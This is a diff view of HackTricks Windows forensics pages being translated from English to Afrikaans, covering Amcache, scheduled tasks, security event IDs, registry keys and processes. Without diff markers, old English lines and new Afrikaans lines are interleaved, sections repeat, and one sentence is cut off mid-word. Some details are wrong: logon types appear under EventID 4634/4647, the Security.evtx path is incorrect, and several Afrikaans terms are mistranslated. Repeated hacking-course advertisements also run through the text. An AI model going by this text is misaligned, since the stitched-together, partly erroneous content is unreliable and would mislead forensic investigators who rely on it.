Hierdie lêer is merkwaardig omdat dit rekords van onlangs uitgevoerde prosesse stoor, insluitend die paaie na die uitvoerbare lêers en hul SHA1-hashes. Hierdie inligting is van onschatbare waarde vir die opspoor van die aktiwiteit van toepassings op 'n stelsel.
Om die data uit **Amcache.hve** te onttrek en te analiseer, kan die [**AmcacheParser**-hulpmiddel](https://github.com/EricZimmerman/AmcacheParser) gebruik word. Die volgende opdrag is 'n voorbeeld van hoe om AmcacheParser te gebruik om die inhoud van die **Amcache.hve**-lêer te ontleden en die resultate in CSV-formaat uit te voer:
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
Onder die gegenereerde CSV-lêers is die `Amcache_Unassociated file entries` veral merkwaardig vanweë die ryk inligting wat dit verskaf oor nie-geassosieerde lêerinvoere.
Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
Die mees interessante CVS-lêer wat gegenereer word, is die `Amcache_Unassociated file entries`.
### RecentFileCache
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
Hierdie artefak kan slegs in W7 gevind word in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` en dit bevat inligting oor die onlangse uitvoering van sekere bineêre lêers.
You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
Jy kan die instrument [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) gebruik om die lêer te ontled.
### Scheduled tasks
### Geskeduleerde take
You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
Jy kan hulle onttrek uit `C:\Windows\Tasks` of `C:\Windows\System32\Tasks` en as XML lees.
### Services
### Dienste
You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
Jy kan hulle in die register vind onder `SYSTEM\ControlSet001\Services`. Jy kan sien wat uitgevoer gaan word en wanneer.
### **Windows Store**
The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
Die geïnstalleerde programme kan gevind word in `\ProgramData\Microsoft\Windows\AppRepository\`\
Hierdie bewaarplek het 'n **log** met **elke geïnstalleerde toepassing** in die stelsel binne die databasis **`StateRepository-Machine.srd`**.
Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential.
Binne die Toepassingstabel van hierdie databasis is dit moontlik om die kolomme te vind: "Toepassings-ID", "Pakketnommer" en "Vertoonnaam". Hierdie kolomme bevat inligting oor vooraf geïnstalleerde en geïnstalleerde toepassings en dit kan gevind word of sommige toepassings gedeïnstalleer is omdat die ID's van geïnstalleerde toepassings opeenvolgend moet wees.
It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
Dit is ook moontlik om **geïnstalleerde toepassing** te vind binne die registerpad: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
En **gedeïnstalleerde** **toepassings** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
## Windows Events
## Windows-gebeure
Information that appears inside Windows events are:
Inligting wat binne Windows-gebeure verskyn, is:
* What happened
* Timestamp (UTC + 0)
* Users involved
* Hosts involved (hostname, IP)
* Assets accessed (files, folder, printer, services)
* Wat gebeur het
* Tydstempel (UTC + 0)
* Betrokke gebruikers
* Betrokke gasheer (gasheernaam, IP)
* Betrokke bates (lêers, vouer, drukkers, dienste)
The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension.
Die loglêers is geleë in `C:\Windows\System32\config` voor Windows Vista en in `C:\Windows\System32\winevt\Logs` na Windows Vista. Voor Windows Vista was die gebeurtenisloglêers in binêre formaat en daarna is dit in **XML-formaat** en gebruik die **.evtx**-uitbreiding.
The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
Die ligging van die gebeurtenislêers kan gevind word in die SISTEEM-register in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
Dit kan gesien word vanuit die Windows-gebeurtenisleser (**`eventvwr.msc`**) of met ander instrumente soos [**Event Log Explorer**](https://eventlogxp.com) **of** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
## Understanding Windows Security Event Logging
## Begrip van Windows-sekuriteitsgebeure
Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access.
Toegangsgebeure word aangeteken in die sekuriteitskonfigurasie-lêer wat geleë is by `C:\Windows\System32\winevt\Security.evtx`. Hierdie lêer se grootte is aanpasbaar, en wanneer sy kapasiteit bereik is, word ouer gebeure oorskryf. Aangetekende gebeure sluit gebruikersaanmeldings en -afmeldings, gebruikersaksies en veranderinge aan sekuriteitsinstellings in, sowel as toegang tot lêers, vouers en gedeelde bates.
### Key Event IDs for User Authentication:
### Sleutel-gebeurtenis-ID's vir gebruikersverifikasie:
- **EventID 4624**: Indicates a user successfully authenticated.
- **EventID 4625**: Signals an authentication failure.
- **EventIDs 4634/4647**: Represent user logoff events.
- **EventID 4672**: Denotes login with administrative privileges.
- **Gebeurtenis-ID 4624**: Dui aan dat 'n gebruiker suksesvol geverifieer is.
- **Gebeurtenis-ID 4625**: Dui op 'n mislukte verifikasie.
- **Gebeurtenis-ID's 4634/4647**: Verteenwoordig gebruikersafmeldingsgebeure.
- **Gebeurtenis-ID 4672**: Dui op aanmelding met administratiewe voorregte.
#### Sub-types within EventID 4634/4647:
#### Subtipes binne Gebeurtenis-ID 4634/4647:
- **Interactive (2)**: Direct user login.
- **Network (3)**: Access to shared folders.
- **Batch (4)**: Execution of batch processes.
- **Service (5)**: Service launches.
- **Proxy (6)**: Proxy authentication.
- **Unlock (7)**: Screen unlocked with a password.
- **Network Cleartext (8)**: Clear text password transmission, often from IIS.
- **New Credentials (9)**: Usage of different credentials for access.
- **Remote Interactive (10)**: Remote desktop or terminal services login.
- **Cache Interactive (11)**: Login with cached credentials without domain controller contact.
- **Cache Remote Interactive (12)**: Remote login with cached credentials.
- **Cached Unlock (13)**: Unlocking with cached credentials.
- **Interaktief (2)**: Direkte gebruikersaanmelding.
- **Netwerk (3)**: Toegang tot gedeelde vouers.
- **Batch (4)**: Uitvoering van lotprosesse.
- **Diens (5)**: Dienslansering.
- **Proxy (6)**: Proxy-verifikasie.
- **Ontsluit (7)**: Skerm ontgrendel met 'n wagwoord.
- **Netwerkduidelike teks (8)**: Duidelike teks wagwoordoordrag, dikwels vanaf IIS.
- **Nuwe legitimasie (9)**: Gebruik van verskillende legitimasie vir toegang.
- **Verwyderde interaktief (10)**: Verwyderde skerm of terminaaldiensaanmelding.
- **Verwyderde interaktiewe opgesluit (11)**: Aanmelding met opgeslote legitimasie sonder kontak met 'n domeinbeheerder.
- **Verwyderde ontgrendeling (12)**: Verwyderde aanmelding met opgeslote legitimasie.
- **Opgeslote ontgrendeling (13)**: Ontsluiting met opgeslote legitimasie.
#### Status and Sub Status Codes for EventID 4625:
#### Status- en Substatuskodes vir Gebeurtenis-ID 4625:
- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack.
- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt.
- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins.
- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts.
- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access.
- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location.
- **0xC0000193**: Account expiration - Access attempts with expired user accounts.
- **0xC0000071**: Expired password - Login attempts with outdated passwords.
- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket.
- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security.
- **0xC0000225**: Indicates a system bug rather than a security issue.
- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon.
- **0xC0000064**: Gebruikersnaam bestaan nie - Kan dui op 'n aanval van gebruikersnaamopname.
- **0xC000006A**: Korrekte gebruikersnaam, maar verkeerde wagwoord - Moontlike wagwoord raai of brute force-poging.
- **0xC0000234**: Gebruikersrekening gesluit - Kan volg op 'n brute force-aanval met verskeie mislukte aanmeldings.
- **0xC0000072**: Rekening gedeaktiveer - Onbevoegde pogings om gedeaktiveerde rekeninge te benader.
- **0xC000006F**: Aanmelding buite toegelate tyd - Dui op pogings om buite die vasgestelde aanmeldingstye toegang te verkry, 'n moontlike teken van onbevoegde toegang.
- **0xC0000070**: Oortreding van werksplekbeperkings - Kan 'n poging wees om vanaf 'n onbevoegde plek aan te meld.
- **0xC0000193**: Rekening verval - Toegangspogings met vervalde gebruikersrekeninge.
- **0xC0000071**: Vervalde wagwoord - Aanmeldingspogings met verouderde wagwoorde.
- **0xC0000133**: Tydsinkronisasieprobleme - Groot tydverskille tussen kliënt en bediener kan dui op meer gesofistikeerde aanvalle soos pass-the-ticket.
- **0xC0000224**: Verpligte wagwoordverandering vereis - Gereelde verpligte veranderinge kan dui op 'n poging om rekeningsekuriteit te destabiliseer.
- **0xC0000225**: Dui op 'n stelselfout eerder as 'n sekuriteitsprobleem.
- **0xC000015b**: Geweierde aanmeldingstipe - Toegangspoging met onbevoegde aanmeldingstipe, soos 'n gebruiker wat probeer om 'n diensaanmelding uit te voer.
#### EventID 4616:
- **Time Change**: Modification of the system time, could obscure the timeline of events.
#### Gebeurtenis-ID 4616:
- **Tydverandering**: Wysiging van die stelseltyd, kan die tydlyn van gebeure verwar.
#### EventID 6005 and 6006:
- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down.
#### Gebeurtenis-ID's 6005 en 6006:
- **Stelselbegin en -afsluiting**: Gebeurtenis-ID 6005 dui op die begin van die stelsel, terwyl Gebeurtenis-ID 6006 dit aandui wanneer dit afsluit.
#### EventID 1102:
- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities.
#### Gebeurtenis-ID 1102:
- **Logwissing**: Sekuriteitslêers wat skoongevee word, wat dikwels 'n rooi vlag is vir die bedek van onwettige aktiwiteite.
#### EventIDs for USB Device Tracking:
- **20001 / 20003 / 10000**: USB device first connection.
- **10100**: USB driver update.
- **EventID 112**: Time of USB device insertion.
#### Gebeurtenis-ID's vir USB-toestelopsporing:
- **20001 / 20003 / 10000**: Eerste koppeling van USB-toestel.
- **10100**: USB-bestuursprogramopdatering.
- **Gebeurtenis-ID 112**: Tyd van USB-toestelinvoeging.
For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
Vir praktiese voorbeelde van die simulasie van hierdie aanmeldingstipes en geleenthede vir legitimasie-onttrekking, verwys na [Altered Security se gedetailleerde gids](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625.
Gebeurtenisbesonderhede, insluitend status- en substatuskodes, bied verdere insig in die oorsake van gebeure, ver
#### Stelselkraggebeure
### Recovering Windows Events
EventID 6005 dui op stelselbegin, terwyl EventID 6006 afsluiting aandui.
To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events.
#### Logverwydering
### Identifying Common Attacks via Windows Events
For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/).
#### Brute Force Attacks
Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds.
#### Time Change
Recorded by EventID 4616, changes to system time can complicate forensic analysis.
#### USB Device Tracking
Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
#### System Power Events
EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
#### Log Deletion
Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
Veiligheid EventID 1102 dui op die verwydering van logboeke, 'n kritieke gebeurtenis vir forensiese analise.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

129
forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View file

@ -1,106 +1,87 @@
# Interesting Windows Registry Keys
# Interessante Windows-registernøkke
### Interesting Windows Registry Keys
### Interessante Windows-registernøkke
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
### **Windows Version and Owner Info**
- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.
### **Windows-weergawe en eienaarinligting**
- Onder **`Software\Microsoft\Windows NT\CurrentVersion`** sal jy die Windows-weergawe, dienspakket, installasie-tyd en die geregistreerde eienaar se naam op 'n maklike manier vind.
### **Computer Name**
- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**.
### **Rekenaarnaam**
- Die rekenaarnaam word gevind onder **`System\ControlSet001\Control\ComputerName\ComputerName`**.
### **Time Zone Setting**
- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**.
### **Tydsone-instelling**
- Die stelsel se tydsone word gestoor in **`System\ControlSet001\Control\TimeZoneInformation`**.
### **Access Time Tracking**
- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
`fsutil behavior set disablelastaccess 0`
### **Toegangstydopsporing**
- Standaard is die laaste toegangstydopsporing afgeskakel (**`NtfsDisableLastAccessUpdate=1`**). Om dit in te skakel, gebruik:
`fsutil behavior set disablelastaccess 0`
### Windows Versions and Service Packs
- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
### Windows-weergawes en dienspakette
- Die **Windows-weergawe** dui die uitgawe aan (bv. Home, Pro) en sy vrystelling (bv. Windows 10, Windows 11), terwyl **dienspakette** opdaterings is wat herstelwerk en soms nuwe funksies insluit.
### Enabling Last Access Time
- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring.
### Aktivering van laaste toegangstyd
- Die aktivering van laaste toegangstydopsporing stel jou in staat om te sien wanneer lêers laas geopen is, wat krities kan wees vir forensiese analise of stelselmonitering.
### Network Information Details
- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions.
### Netwerkinligtingbesonderhede
- Die register bevat uitgebreide data oor netwerk-konfigurasies, insluitend **netwerksoorte (draadloos, kabel, 3G)** en **netwerkkategorieë (Openbaar, Privaat/Tuis, Domein/Werk)**, wat belangrik is vir die verstaan van netwerksekuriteitsinstellings en toestemmings.
### Client Side Caching (CSC)
- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity.
### Kliëntkant-caching (CSC)
- **CSC** verbeter die toegang tot lêers buite lyn deur kopieë van gedeelde lêers te kas. Verskillende **CSCFlags**-instellings beheer hoe en watter lêers gekas word, wat die prestasie en gebruikerservaring beïnvloed, veral in omgewings met onderbroke konnektiwiteit.
### AutoStart Programs
- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software.
### Outomatiese beginprogramme
- Programme wat in verskillende `Run`- en `RunOnce`-registernøkke gelys word, word outomaties by opstart geloods, wat die stelselopstarttyd beïnvloed en moontlik punte van belang kan wees om kwaadwillige sagteware of ongewenste sagteware te identifiseer.
### Shellbags
- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means.
- **Shellbags** stoor nie net voorkeure vir vouer-aansigte nie, maar verskaf ook forensiese bewyse van vouertoegang selfs as die vouer nie meer bestaan nie. Dit is van onskatbare waarde vir ondersoeke en onthul gebruikersaktiwiteit wat nie duidelik is deur ander middels nie.
### USB Information and Forensics
- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents.
### USB-inligting en forensika
- Die besonderhede wat in die register oor USB-toestelle gestoor word, kan help om vas te stel watter toestelle aan 'n rekenaar gekoppel was, moontlik 'n toestel aan gevoelige lêeroordragte of ongemagtigde toegangsgevalle te koppel.
### Volume Serial Number
- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices.
### Volume-seriëlenommer
- Die **Volume-seriëlenommer** kan van kritieke belang wees vir die opsporing van die spesifieke instansie van 'n lêersisteem, wat nuttig is in forensiese scenario's waar lêeroorsprong oor verskillende toestelle vasgestel moet word.
### **Shutdown Details**
- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**.
### **Afsluitingsbesonderhede**
- Afsluitingstyd en telling (laasgenoemde slegs vir XP) word in **`System\ControlSet001\Control\Windows`** en **`System\ControlSet001\Control\Watchdog\Display`** gehou.
### **Network Configuration**
- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
### **Netwerk-konfigurasie**
- Vir gedetailleerde netwerkinterface-inligting, verwys na **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
- Eerste en laaste netwerkverbindings-tye, insluitend VPN-verbindings, word gelog onder verskillende paaie in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
### **Shared Folders**
- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability.
### **Gedeelde vouers**
- Gedeelde vouers en instellings is onder **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Kliëntkant-caching (CSC) instellings bepaal die beskikbaarheid van lêers buite lyn.
### **Programs that Start Automatically**
- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup.
### **Programme wat outomaties begin**
- Paaie soos **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** en soortgelyke inskrywings onder `Software\Microsoft\Windows\CurrentVersion` beskryf programme wat by opstart ingestel is om uit te voer.
### **Searches and Typed Paths**
- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively.
### **Soektogte en getikte paaie**
- Ontdekkingsreisiger-soektogte en getikte paaie word in die register onder **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** vir WordwheelQuery en TypedPaths, onderskeidelik, gevolg.
### **Recent Documents and Office Files**
- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths.
### **Onlangse dokumente en Office-lêers**
- Onlangse dokumente en Office-lêers wat geopen is, word aangeteken in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` en spesifieke Office-weergawepaaie.
### **Most Recently Used (MRU) Items**
- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`.
### **Mees onlangs gebruikte (MRU) items**
- MRU-lyste, wat onlangse lêerpaaie en opdragte aandui, word gestoor in verskillende `ComDlg32`- en `Explorer`-subnøkke onder `NTUSER.DAT`.
### **User Activity Tracking**
- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
### **Gebruikersaktiwiteitopsporing**
- Die Gebruikerhulp-funksie hou gedetailleerde toepassingsgebruikstatistieke by, insluitend uitvoertelling en laaste uitvoertyd, by **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
### **Shellbags Analysis**
- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis.
### **Shellbags-analise**
- Shellbags, wat vouertoegangsdetails onthul, word gestoor in `USRCLASS.DAT` en `NTUSER.DAT` onder `Software\Microsoft\Windows\Shell`. Gebruik **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** vir analise.
### **USB Device History**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps.
- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**.
- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively.
This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
### **USB-toestelgeskiedenis**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** en **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bevat ryk besonderhede oor gekoppelde USB-toestelle, insluitend vervaardiger, produknaam en koppeltydstempels.
- Die gebruiker wat met 'n spesifieke USB-toestel

126
forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
View file

@ -1,147 +1,137 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
</details>
## smss.exe
**Session Manager**.\
Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.
